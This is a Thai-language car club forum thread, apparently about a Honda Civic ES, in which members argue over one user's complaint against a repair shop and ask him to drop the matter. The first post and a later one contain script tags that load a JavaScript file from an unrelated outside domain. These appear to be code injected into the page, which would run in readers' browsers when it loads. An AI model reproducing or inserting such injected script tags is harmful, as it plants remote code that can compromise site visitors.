หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
inntuch

เข้าร่วม: 15 สิงหา 2012
ตอบ: 535

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 151
ให้คำขอบคุณ: 1
พุธ, 27 กุมภา 2013 13:13 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
เอาน้า รักกันๆ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
onlined

เข้าร่วม: 19 สิงหา 2012
ตอบ: 70

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 235
ให้คำขอบคุณ: 0

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 27 กุมภา 2013 13:14 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
psYchosis พิมพ์ว่า:
  ลำดับเหตุการณ์

1.อู่ทำงานบกพร่อง
2.ออกมาเรียกร้อง บนเวป
3.อู่ออกมารับผิดชอบ
4.ไม่ขอกลับเข้าไปแก้งาน ยังเรียกร้องเพื่อความสะใจ

บอกก่อนนะว่า ผมไม่เคยกินเบียร์พี่ใหม่เลยสักกระป๋อง เดี๋ยวจะหาว่ามาเข้าข้าง
แต่ที่ออกมาพิมพ์เพราะ ถ้าเป็นอู่อื่น ผมจะบอกให้คุณเอา ระเบิดไปปาหน้าอู่แม่งเลย
แต่นี่มันอู่พี่ใหม่ แกคุยได้ บอกให้แกรู้ แกก็รับผิดชอบ
คือผมอยู่คลับนี้มานาน ตั้งแต่ยังไม่ซื้อ ES จนซื้อมือสองมาขับ และตอนนี้ก็ยังขับอยู่
นี่ก็จะ 9 ปีหละ คือ เราอยู่ด้วยกันแบบพี่น้อง เห็นนิสัยใจคอกันมา
อะไรที่เราเห็นว่า มันมีทางออกเราก็แนะนำ

คุณก็เล่นมาค้านหลังชนฝาว่า ผมไม่เข้าไปแก้
ใครมีปัญหากับอู่นี้เหมือนมีปัญหากับบอร์ด
ใครมาแก้ต่างก็กลายเป็นมาอวยกัน

การที่ออกมาบอกว่า ด่าอู่ไว้เยอะ ไม่กล้าเข้าไปแล้ว
ผมว่า พี่ใหม่ แกลูกผู้ชายนะครับ บอกรับผิดชอบ แกก็รับผิดชอบ
คงไม่มีว่า พอเข้าไปแก้งาน จะเอาคนมารุมกระทืบ
หรือ แกแค้นที่มาด่าอู่เขา

งานดี งานไม่ดีบอกพี่ใหม่เขาไปเลยครับ ไม่ใช่กลับบ้านแล้วมาบ่นทีหลัง
เพราะอย่างน้อยพี่ใหม่เขาก็ได้เอาไปปรับปรุง การทำงานของลูกน้อง
งานไหนดีเราก็ซื่นชม เขาก็ได้กำลังใจ

ตอนแรกว่าจะไม่ตอบหละ ตอบไปข้อความผมก็ไม่ได้เกิดประโยชน์อะไร แต่เห็นยาวกัน 

โทษครับคุณบอกไม่เคยกินเบียรกับพี่แก หมายถึงไม่ค่อยสนิทหรือเปล่าครับ

แล้วรู้ได้ไงแกลูกผู้ ช พอครับ

ผมเห็น เพื่อนกัน โกงกัน ยืมตังกัน แล้วชิ่ง มาหลายรายแล้ว ขนาดบางคนที่ว่า รู้จักกันมาตั้งแต่ เรียน ประถม มัธยม  สนิทกันมาเป็น สิบๆปี

หุ้นส่วนกันโกงกัน ก็มีมาแล้ว พี่น้องกัน ยังแย่งสมบัติกันได้  แล้วในเมื่อความหมายของคุณไม่สนิทกะเจ้าของร้าน คุณรู็ได้ไงครับ ว่าเขาลูกผู้ ช ตัวจริง

ผมไม่ใว้ใจใครหรอกนะครับ เพราะผมออกมาพูดแบบนี้ เท่ากับ ผมได้สร้างศัตรูไปในตัวเยอะอยู่แล้ว ข้อนี้ผมรู้ตัวดี มีคนไม่พอใจผมอยู่ เยอะ !!!
ได้รับคำขอบคุณจาก: Guide6351 
Over_Boost

เข้าร่วม: 28 ตุลา 2011
ตอบ: 596

ได้รับคำขอบคุณ: 715
ให้คำขอบคุณ: 592

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 27 กุมภา 2013 13:34 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ผมหาทางออกให้คร่าวๆนะครับ และหวังว่ามันจะจบ...ด้วยดี

ที่ผมทำ ผมเพียงแค่หวังดีต่อทุกฝ่ายนะครับ

คุณไม่กล้าเข้าไปทำใช่ไหม...โอเค ไม่เป็นไร คุณนัดเจอผมก็ได้ใกล้ๆแถวนั้น ผมจะขับรถคุณเข้าไปทำให้ แต่!!! ไม่ต้องกลัวผมจะขโมยรถพี่หรอก ผมให้พี่ยืนเฝ้ารถผมเลย ผมจะจอดไว้ตรงนั้น สำเนาบัตร ทะเบียนบ้านให้ด้วย ตามตัวได้แน่นอนถ้าผมตุกติก

พอทำเสร็จ ผมเดินกลับไปเอาให้แล้วขับมาคืนพี่...จบ วินและฟิน กันไป

ปล. รอไม่ต้องห่างร้านมากก็ได้ เดี๋ยวผมเอารถพี่ไปทิ้งไว้ให้ แล้วผมจะเดินกลับไปหาพี่ หาข้าวทานรอรถด้วยกัน โทรนัดเจ้าของอู่เลย ขอคิวหน่อย เคสเร่งด่วน

หรือ
ผมเอาไปส่งให้ไหมครับ กทม.ชลบุรี ผมชิลๆ ผมจะถือโอกาสพาแฟนไปเที่ยวทะเลด้วยเลย ไม่ต้องกลัวว่าผมจะขโมยหรือเนียนของชิ้นนี้หรอกครับ เพราะรถผมมีแล้ว และผมกล้าที่จะสำเนาเอกสารต่างๆทิ้งไว้ให้ทางร้านไว้เช่นกัน ของถึงมือแน่นอน

สนใจก็ลองตัดสินใจดูนะครับ

หรือไม่ไว้ใจผมและมีทางออกที่ดีทางอื่นก็ลองเสนอมาดูครับ อยากให้จบได้แล้ว มันยาวไปแล้ว

คนที่ตัดสินใจซื้อ ES ก็ืคือคนที่มีเจตนารมเดียวกัน รักใน ES เหมือนๆกัน และผมก็เชื่อว่าพี่ก็รักรถพี่

ปล. ไม่ต้องกลัวว่าผมจะ ตุกติกนะครับ พี่ผมเปิดอู่อยู่ในซอยนวลจันทร์ ถ้าผมตุกติก ไปตามหาผมได้ที่นั่น เพราะผมไปนั่งเล่นหลังเลิกงานเกือบทุกวัน ปากซอย สน.คันนายาว

แก้ไขล่าสุดโดย เมื่อ พุธ, 27 กุมภา 2013 13:41, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: POP_ES05  ballanupong  Oyoyoo  Pantamitr  Sak_es5442  PoKo  เสก  luckratchada  thammarong007  kaisuh  KAATO 
YINDEE

ชื่อเล่น: ต๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3233
ให้คำขอบคุณ: 3684

ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 27 กุมภา 2013 13:41 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
จบได้ยังครับ? ถ้าไม่จบ เดี๋ยวผมจะจัดการให้มันจบให้

สังคมเค้าอยู่กันดีๆ ด้วยเหตุและผล

ถ้าเอาการเมืองมายุ่ง เดี๋ยวก็จะยุ่งให้ด้วย คนเห็นต่างมีเย๊อะ   

อยากนั่งคุยกันไหม  อย่าเก่งกันหลังคีย์บอร์ด

มาคุยกัน มาเคลียร์กัน อย่ามาทะเลาะกันในนี้ ไม่ชอบหว่ะ

สาธารณะก็จริงแต่ไม่ใช่ว่าจะทำไรก็ได้ตามใจทุกอย่าง

ที่นี่ไม่มีนักเลง ไม่มีศัตรู  ที่นี่มีแต่เพื่อน จำไว้ครับ
ได้รับคำขอบคุณจาก: NeaT ES.  lkki5  Over_Boost  waymania  cisco  es330  Golfzaa  khing_cr  DELL  POD943  Sak_es5442  koobe  puyzaaaaa  suttijate  thammarong007  สมชาย 
Over_Boost

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 27 กุมภา 2013 13:41 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
YINDEE พิมพ์ว่า:
จบได้ยังครับ? ถ้าไม่จบ เดี๋ยวผมจะจัดการให้มันจบให้

สังคมเค้าอยู่กันดีๆ ด้วยเหตุและผล

ถ้าเอาการเมืองมายุ่ง เดี๋ยวก็จะยุ่งให้ด้วย คนเห็นต่างมีเย๊อะ   

อยากนั่งคุยกันไหม  อย่าเก่งกันหลังคีย์บอร์ด

มาคุยกัน มาเคลียร์กัน อย่ามาทะเลาะกันในนี้ ไม่ชอบหว่ะ

สาธารณะก็จริงแต่ไม่ใช่ว่าจะทำไรก็ได้ตามใจทุกอย่าง

ที่นี่ไม่มีนักเลง ไม่มีศัตรู  ที่นี่มีแต่เพื่อน จำไว้ครับ

ใจเย็นๆคร้าบบบบบบบบบบ
ได้รับคำขอบคุณจาก: waymania 
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
พุธ, 27 กุมภา 2013 14:08 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
เกรียนแท้เหลา <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Over_Boost  waymania  koobe 
Ton-

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พุธ, 27 กุมภา 2013 14:13 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ตรรกะที่ยกมากล่าวอ้างแต่ละอย่างนี่ิเล่นเอาฮาแทบตกเก้าอี้ หัีวหน้างานไปอาบอบนวด อย่างงี้ เพื่อนยืมเิงินไม่คืน อย่างนี้ 

บร้ะะะะจ่างงงง คิดได้ไงวะเนี่ย
ได้รับคำขอบคุณจาก: wut-chiangmai  si_ton  yenjai  Over_Boost  akkarin_c  waymania  cisco 
mamarain

ชื่อเล่น: โชค

เข้าร่วม: 16 กันยา 2010
ตอบ: 408

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 473

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 27 กุมภา 2013 14:53 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
อ่านตามๆมาตั้งแต่กระทู้แรก ก็รู้สึกสงสาร onlined เหมือนกันเพราะก็เคยโดนกรณีแบบนี้มาเหมือนกัน แต่พออ่านไปเรื่อยๆ เริ่มรู้สึกว่าคุณonlinedไม่มีความเป็นผู้ใหญ่เลย ยังไม่ได้คุยกับคู่กรณีโดยตรงเลยก็คิดเองเออเองว่าต้องเป็นแบบนี้แบบนั้น แสดงว่าคุณเป็นคนที่โลกแคบมาก ลองเปิดใจให้กว้างแล้วทำตัวแมนๆหน่อยครับ ไม่ใช่หลบอยู่หลังหน้าจอแล้วก็พิมพ์ๆๆๆ บางทีมันอาจจะไม่เป็นอย่างที่คุณคิดก็ได้

ปล.ผมไม่ได้อยู่ข้างใครนะครับ เพราะผมก็ไม่เคยไปทำรถร้านนี้ครับ แต่อยากให้คุณ onlined ปรับเปลี่ยนทัศนคติใหม่ครับ
ได้รับคำขอบคุณจาก: wut-chiangmai  focusyo 
Over_Boost

พุธ, 27 กุมภา 2013 15:17 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
 ดื่มเบียร์ให้ใจเย็นๆกันก่อนดีกว่านะครับทุกท่าน
ได้รับคำขอบคุณจาก: Auizie  Sak_es5442 
POP_ES05

ชื่อเล่น: ป๊อบ

เข้าร่วม: 13 ธันวา 2011
ตอบ: 679

Guru ES
Guru ES

ได้รับคำขอบคุณ: 350
ให้คำขอบคุณ: 1909

สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 27 กุมภา 2013 15:53 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
Over_Boost พิมพ์ว่า:
 ดื่มเบียร์ให้ใจเย็นๆกันก่อนดีกว่านะครับทุกท่าน

+1 เฮ้า.. ชนแก้ว
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ปี: 2004
พุธ, 27 กุมภา 2013 16:57 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป

ใครคิดว่าผมผิดประเด็นไหนบอกมาได้เลยนะ

ส่วนใครที่ pm + chat ไปให้กำลังใจ ก็ ดูไว้นะครับ นี่แหละ คือคนที่พวกคุณให้กำลังใจอยู่

ลายเซ็นต์ Onlined ถ้าผมจะไม่มีที่อยู่ ไม่มีจุดยืนก้เพราะเจอคนอย่างคุณนั่นแหละครับ !!!!

ผมว่า ที่คุณไม่มีที่อยู่ ไม่มีจุดยืน เพราะตัวคุณเองมากกว่าครับ
ได้รับคำขอบคุณจาก: onitsuka37  wut-chiangmai  focusyo  es330  khing_cr  tonkla  luckratchada 
si_ton

ชื่อเล่น: ต้น

เข้าร่วม: 04 พฤศจิกา 2011
ตอบ: 294

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 272
ให้คำขอบคุณ: 203

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 27 กุมภา 2013 17:08 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
mamarain พิมพ์ว่า:
อ่านตามๆมาตั้งแต่กระทู้แรก ก็รู้สึกสงสาร onlined เหมือนกันเพราะก็เคยโดนกรณีแบบนี้มาเหมือนกัน แต่พออ่านไปเรื่อยๆ เริ่มรู้สึกว่าคุณonlinedไม่มีความเป็นผู้ใหญ่เลย ยังไม่ได้คุยกับคู่กรณีโดยตรงเลยก็คิดเองเออเองว่าต้องเป็นแบบนี้แบบนั้น แสดงว่าคุณเป็นคนที่โลกแคบมาก ลองเปิดใจให้กว้างแล้วทำตัวแมนๆหน่อยครับ ไม่ใช่หลบอยู่หลังหน้าจอแล้วก็พิมพ์ๆๆๆ บางทีมันอาจจะไม่เป็นอย่างที่คุณคิดก็ได้

ปล.ผมไม่ได้อยู่ข้างใครนะครับ เพราะผมก็ไม่เคยไปทำรถร้านนี้ครับ แต่อยากให้คุณ onlined ปรับเปลี่ยนทัศนคติใหม่ครับ

POP_ES05 พิมพ์ว่า:
Over_Boost พิมพ์ว่า:

+1 เฮ้า.. ชนแก้ว

+1 เลิกงานแล้ว เอ้าชน
earnee33

ชื่อเล่น: เอิร์น

เข้าร่วม: 08 เมษา 2010
ตอบ: 1349

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1428
ให้คำขอบคุณ: 584

พุธ, 27 กุมภา 2013 17:12 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
hacker พิมพ์ว่า:

ลายเซ็นต์ Onlined ถ้าผมจะไม่มีที่อยู่ ไม่มีจุดยืนก้เพราะเจอคนอย่างคุณนั่นแหละครับ !!!!

ผมว่า ที่คุณไม่มีที่อยู่ ไม่มีจุดยืน เพราะตัวคุณเองมากกว่าครับ

โดนใจ 
ได้รับคำขอบคุณจาก: wut-chiangmai 
Pluak_Ka

เข้าร่วม: 13 มกรา 2012
ตอบ: 53

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 200
ให้คำขอบคุณ: 4
พุธ, 27 กุมภา 2013 17:55 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
พี่ๆคร๊าใจร่มๆกันบ้างเถิดคร๊าลองเอาใจเค๊ามาใส่ใจเราดูนะคะว่าถ้าพี่มีชีวิตแบบพี่onlinedแล้วพี่จะรู้สึกกันอย่างไรคะ พวกพี่ๆเ้กิดมามีบุญนี่คะมีเพื่อนๆเยอะแยะ เอารถไปซ่อมช่วงล่างเจ้าของร้านกางร่มปูพรมรับแถมแทบจะให้ลูกน้องมาอุ้มเข้าไปซ่อมรถเสดยังเลี้ยงเบียร์ด้วยซ่อมกันจนเป็นพี่เป็นน้องกันพวกพี่ไม่เข้าใจพี่onlinedเค้าหรอกคะ อย่างนี้นู๋ว่ามันไม่แฟร์เลยมองอย่างไรก็ไม่แฟร์ ทั้งไม่แฟร์ ไม่คิงเท็ก ไม่ดูเร็ก กะพี่onlinedเลยล่ะคะ

พวกพี่ๆคนอื่นๆถึงจะชอบแต่งรถแต่มีเงินถุงเงินถังนี่คะ แต่พี่onlinedเค้าหาเงินมายากลำบากนะคะพี่ปีกนกห้าพันเนี่ยมันเยอะมากนะคะพวกพี่ีมีกันเยอะแล้วพวกพี่ไม่เข้าใจหลอก พี่คิดดูนะเวลาพี่onlinedไปที่ทำงานเจ้านายก็ไม่ไว้ใจชอบจับผิดพี่เค้า จะไปขี้ ไปคุยกับใคร ไปทำอะไร ต้องรายงานเจ้านายตลอดเลยนะคะ พวกพี่คนอื่นๆมีแต่เจ้านายดีๆกันพี่ไม่เข้าใจหลอก ถ้าพี่onlinedเค้าห่วยทำงานไม่เก่งก็อีกเรื่อง แต่เก่งแล้วมันไม่เฮงเหมือนพวกพี่นี่คะ ทำงานมา  โพยก็มี ยังโดนเพื่อขโมยโพยไม่เป็นผลงานตัวเองอีก ซื้อกันสาดก็ซวยอีกจ่ายเงินตั้งแพงนะราคาเืกือบเท่าของใหม่สภาพมันก็ต้องเหมือนของใหม่ซิคะ พวกพี่ๆคนอื่นๆมีของสภาพดีๆใช้กันมาบ้างเบิกใหม่กันมาบ้าง ได้ของมาแค่สองพันสองบ้างเนี่ยอย่างไรก็ไม่เข้าใจหรอกค่ะ จะไปทำช่วงล่างก็โดนงัดปีกนกเป็นรอยอีก ซ้ำร้ายพอมาผ่อนคลายด้วยการเล่นบอดอีเอสตั้งกระทู้เล่าสู่กันฟังก็มาถูกด่าอีก ซ้ำร้ายมาโดนกระทู้นี้อีก โถถถ ถุย ชีวิตค่ะ พอเถอะค่ะ นะคะ ถึงนู๋จะน่าปลวก แต่ก็อยากวิงวอนพี่ๆให้พอเถอะนะคะ

อย่างน้อยๆก็อยากให้พี่พี่ลองนึกถึงเด็กๆ เด็กเหมือนกระดาษขาว ผ้าขาว ก็เลยอยากให้พี่พี่นึกถึงกระดาษทราย ดูอ่ะคะ นึกดูดีีดีน๊า พี่onlined เค้าก็เหมือน กระดาษทราย ล่ะค่ะ  คอยแต่ขัดคนอื่น ทั้งๆที่ตัวเองก็หยาบบบบบ

พอกันเถิดค่ะนู๋ขอร้องงงงงงงงง
ได้รับคำขอบคุณจาก: onitsuka37  basit  เค  koobe  basicstep  cisco 
suttijate

ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

พุธ, 27 กุมภา 2013 19:31 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ชีวิตอย่าไปซีเรียสมากครับ ปล่อยวางครับ ต้องการอะไรก็บอกกันมาครับ เพราะผมอ่านมายังไม่รู้เลยครับ ว่าพี่ คู่นี้เค้าต้องการอะไรกันครับ

ศักดิ์ศรี หรือ คำขอโทษ หรือว่าอะไรก็บอกมาดิครับ เห็นไม่จบซักที

ผมพูดให้ก็ได้ "ขอโทษครับ" ผมว่าไม่เห็นมันจะยากอะไรเลย อะไรมันค้ำคอกันเหรอครับ เดี๋ยวเผอิญ เด็กมันเกิดเปิดมาเห็นกระทู้นี้มันคงนั่งหัวเราะกันอะครับ ว่าผู้ใหญ่เค้าทำอะไรกันครับ มัวแต่สั่งสอนเด็ก แต่ตัวเองนั่งทะเลาะกันครับ

เว็บนี้ ผมรักนะเพราะ มีคนให้ความช่วยเหลือ แก้ไขปัญหา เรื่องต่าง ๆ ได้เพื่อนใหม่ ๆ อย่าทำให้เว็บมันเปลี่ยน วัตถุประสงค์เลยครับ

ได้รับคำขอบคุณจาก: CROW  Sak_es5442  aunja 
bandai_join

เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 27 กุมภา 2013 19:52 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
Pluak_Ka พิมพ์ว่า:
พี่ๆคร๊าใจร่มๆกันบ้างเถิดคร๊าลองเอาใจเค๊ามาใส่ใจเราดูนะคะว่าถ้าพี่มีชีวิตแบบพี่onlinedแล้วพี่จะรู้สึกกันอย่างไรคะ พวกพี่ๆเ้กิดมามีบุญนี่คะมีเพื่อนๆเยอะแยะ เอารถไปซ่อมช่วงล่างเจ้าของร้านกางร่มปูพรมรับแถมแทบจะให้ลูกน้องมาอุ้มเข้าไปซ่อมรถเสดยังเลี้ยงเบียร์ด้วยซ่อมกันจนเป็นพี่เป็นน้องกันพวกพี่ไม่เข้าใจพี่onlinedเค้าหรอกคะ อย่างนี้นู๋ว่ามันไม่แฟร์เลยมองอย่างไรก็ไม่แฟร์ ทั้งไม่แฟร์ ไม่คิงเท็ก ไม่ดูเร็ก กะพี่onlinedเลยล่ะคะ

พวกพี่ๆคนอื่นๆถึงจะชอบแต่งรถแต่มีเงินถุงเงินถังนี่คะ แต่พี่onlinedเค้าหาเงินมายากลำบากนะคะพี่ปีกนกห้าพันเนี่ยมันเยอะมากนะคะพวกพี่ีมีกันเยอะแล้วพวกพี่ไม่เข้าใจหลอก พี่คิดดูนะเวลาพี่onlinedไปที่ทำงานเจ้านายก็ไม่ไว้ใจชอบจับผิดพี่เค้า จะไปขี้ ไปคุยกับใคร ไปทำอะไร ต้องรายงานเจ้านายตลอดเลยนะคะ พวกพี่คนอื่นๆมีแต่เจ้านายดีๆกันพี่ไม่เข้าใจหลอก ถ้าพี่onlinedเค้าห่วยทำงานไม่เก่งก็อีกเรื่อง แต่เก่งแล้วมันไม่เฮงเหมือนพวกพี่นี่คะ ทำงานมา  โพยก็มี ยังโดนเพื่อขโมยโพยไม่เป็นผลงานตัวเองอีก ซื้อกันสาดก็ซวยอีกจ่ายเงินตั้งแพงนะราคาเืกือบเท่าของใหม่สภาพมันก็ต้องเหมือนของใหม่ซิคะ พวกพี่ๆคนอื่นๆมีของสภาพดีๆใช้กันมาบ้างเบิกใหม่กันมาบ้าง ได้ของมาแค่สองพันสองบ้างเนี่ยอย่างไรก็ไม่เข้าใจหรอกค่ะ จะไปทำช่วงล่างก็โดนงัดปีกนกเป็นรอยอีก ซ้ำร้ายพอมาผ่อนคลายด้วยการเล่นบอดอีเอสตั้งกระทู้เล่าสู่กันฟังก็มาถูกด่าอีก ซ้ำร้ายมาโดนกระทู้นี้อีก โถถถ ถุย ชีวิตค่ะ พอเถอะค่ะ นะคะ ถึงนู๋จะน่าปลวก แต่ก็อยากวิงวอนพี่ๆให้พอเถอะนะคะ

อย่างน้อยๆก็อยากให้พี่พี่ลองนึกถึงเด็กๆ เด็กเหมือนกระดาษขาว ผ้าขาว ก็เลยอยากให้พี่พี่นึกถึงกระดาษทราย ดูอ่ะคะ นึกดูดีีดีน๊า พี่onlined เค้าก็เหมือน กระดาษทราย ล่ะค่ะ  คอยแต่ขัดคนอื่น ทั้งๆที่ตัวเองก็หยาบบบบบ

ผมก็คนนึง ไม่เคยมีตังเหลือๆไว้แต่งรถ กว่าจะได้มาแต่ละชิ้น บางครั้งเก็บเงินหลายเดือน (หลายๆคนในบอร์ดนี้ ถ้ารู้จักผม จะรู้ว่า ผมนั้นก็ไม่ได้มีเงินเหลือเฟือ 555)

ครั้งนึง จำเป็นต้องซื้อ แคมเบอร์หลังมาใส่เพื่อแก้อาการล้อแบะ งานเพื่อนในคลับนี่แหละ แล้วต้องไปรับของที่ร้านพี่ใหม่(รับกับมือพี่ใหม่เลย) แต่ก็ไม่ได้ให้พี่ใหม่ใส่ให้นะครับ เพราะวันนั้น ผมรีบ และที่ร้าน ก็ รอคิวกันเยอะเหลือเกิน ผมเลยแค่ไปรับของและ ไปให้ที่อื่นใส่ สรุปว่า งานที่ผมซื้อมา สวยๆ ราคา 3500 บาท เป็นรอย รอยที่เกิดจากการที่ช่าง(ไม่ขอระบุอู่ที่ผมไปใส่นะครับ) ไม่ได้ใช้ผ้าในการรองก่อนทำการขัน จึงเกิดรอยถลอก เยอะ พอสมควร แต่ ก็ นะ ถ้ามันไม่เป็นรอยวันนี้ วันหน้ามันก็เป็นรอยอยู่ดีของซื้อมาเพื่อใช้งาน ก็เลยชิวๆ ครับ ช่างมัน  และ แม้ร้านนั้น จะทำ ของของผมเป็นรอย ผมก็ยังคงกลับไปใช้ที่ร้านนั้นอยู่  อาจจะเพราะ ผมไมได้ยึดติดกับวุตถุสิ่งของ หรือผมเองก็โดนมาเยอะจน....ชิน หรือ ปลง หรือ เข้าใจ แต่ก็นะ คำว่า "ช่างมัน" ใช้ได้กับเรื่องบางเรื่อง และ บางเรื่อง เองก็มิอาจจะ "ช่างมัน" ได้ อันนี้ ก็สุดแล้วแต่ มุมมองของแต่ละคนครับ ยังไง ก็ขอให้เรื่องนี้จบอย่าง แฮปปี้ ไวไวนะครับ 
ได้รับคำขอบคุณจาก: aunja  luckratchada  wut-chiangmai  cisco  KAATO 
Golfzaa

ชื่อเล่น: กอล์ฟครับ

เข้าร่วม: 17 พฤษภาคม 2012
ตอบ: 486

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 633

พุธ, 27 กุมภา 2013 20:02 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
skunk2 ไอ้ตัวเหม็น เป็นเหตุ.................
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

พุธ, 27 กุมภา 2013 20:23 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ใจเย็นๆครับ  ขนาดน้องผมซื้อไอโฟน5 ที่ใครหลายๆคนอยากได้เป็นเจ้าของนักหนา น้องผมยังได้เปลี่ยนเครื่องใหม่ไป2รอบ

เจอพนักงานกวนตินบางทีก็ต้องทำใจ เพราะความคิดคนเรามันต่างกันจริงๆล่ะครับ 

พนักงานมันก็คิดว่า เปลี่ยนให้ก็บุญถมแล้ว  แถมรอบ2เจอมันพูดว่านี่ถ้าเป็นฝรั่งเขาไม่ให้เปลี่ยนกันง่ายๆนะนี่

แต่สำหรับเรา แหม่คุณพนักงาน  เวลาของคุณนี่มันไม่มีค่าเลยหรอ พ่อคุณเป็นคนไทยรึปล่าวน้อ เสียเวลาขับรถมาเปลี่ยนที 2ชั่วโมง ค่าน้ำมันอีกเกือบๆพันให้กับเครื่องวี6

นี่น่ะครับ  ความคิดเห็นต่างกันเพราะเราอยู่กันคนละมุม  บางทีก็ต้องให้อภัยกัน 
แต่บางทีก็ต้องเห็นใจคนที่เขามาเปลี่ยนด้วย เสียเวลามาทำรอบแรก ไม่จบต้องกลับมาแก้งาน เขาต้องลางาน เสียเวลาและค่าน้ำมัน เราจะซื้อใจเขาอย่างไรดีให้ลูกค้าเขาติดใจ อยากไปอีก

บางทีเสียงส่วนน้อยอาจไม่สำคัญ แต่เมื่อมีบ่ิอยๆระวังจะกลายเป็นเสียงส่วนมากนะครับ
ได้รับคำขอบคุณจาก: CROW  สมชาย 
Wal2n_ES

ชื่อเล่น: ว่าน

ตอบ: 615

Guru ES
Guru ES

ได้รับคำขอบคุณ: 812
ให้คำขอบคุณ: 819

พุธ, 27 กุมภา 2013 20:33 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
onlined พิมพ์ว่า:
สุดยอดครับ เอาข้อความแย่ๆของผมมาออกอากาศ แต่คำพูดดีๆข้อคิดต่างๆ คุณกลับ ไม่เอาออกมาเนอะครับ  ปรบมือ

ผมอุสาห์อธิบายว่าทำไมผมไม่จบโทษครับทำไมผมต้องจบครับ ถ้ามีคนมาทำร้ายคุณ ถ้าเขาออกมาสำนึกผิดขอโทษคุณ จะจบไหมครับ

ไม่งั้นคงไม่มีข่าว ตำรวจพาผู้ร้ายไปขอขมา ประกอบคำสารภาพแล้วโดน ไทยมุงประชาทันหรอกครับ

ผมคนนึงละ ที่ไม่อยากให้เรื่องที่ผมเจอมา เป็นเพียงแค่สายลมที่มันพัดผ่านไป

ไม่อยากให้หลายๆคนเจอการบริการชุ่ยๆอย่างผม

ใครจะว่าผมพูดไม่เลิก  ไม่จบสักที จะพูดไป เชิญครับ

นิสัยของคนไทยลืมง่ายครับ เป็น เอกลักษณ์ แต่ผมเป็นคนไทยคนนึง ที่จะไม่ลืมง่ายๆ ครับ

ไม่ให้ตัวเองลืม ไม่ให้คนไทยด้วยกันลืม

ผมจะเปรียบเทียบให้ฟังนะครับ

เหมือนที่หลายๆคนลืมไปแล้ว ว่าใครมันมาเผาบ้านเผาเมืองเรา แล้วให้มันขึ้นเป็นใหญ่ทุกวันนี้

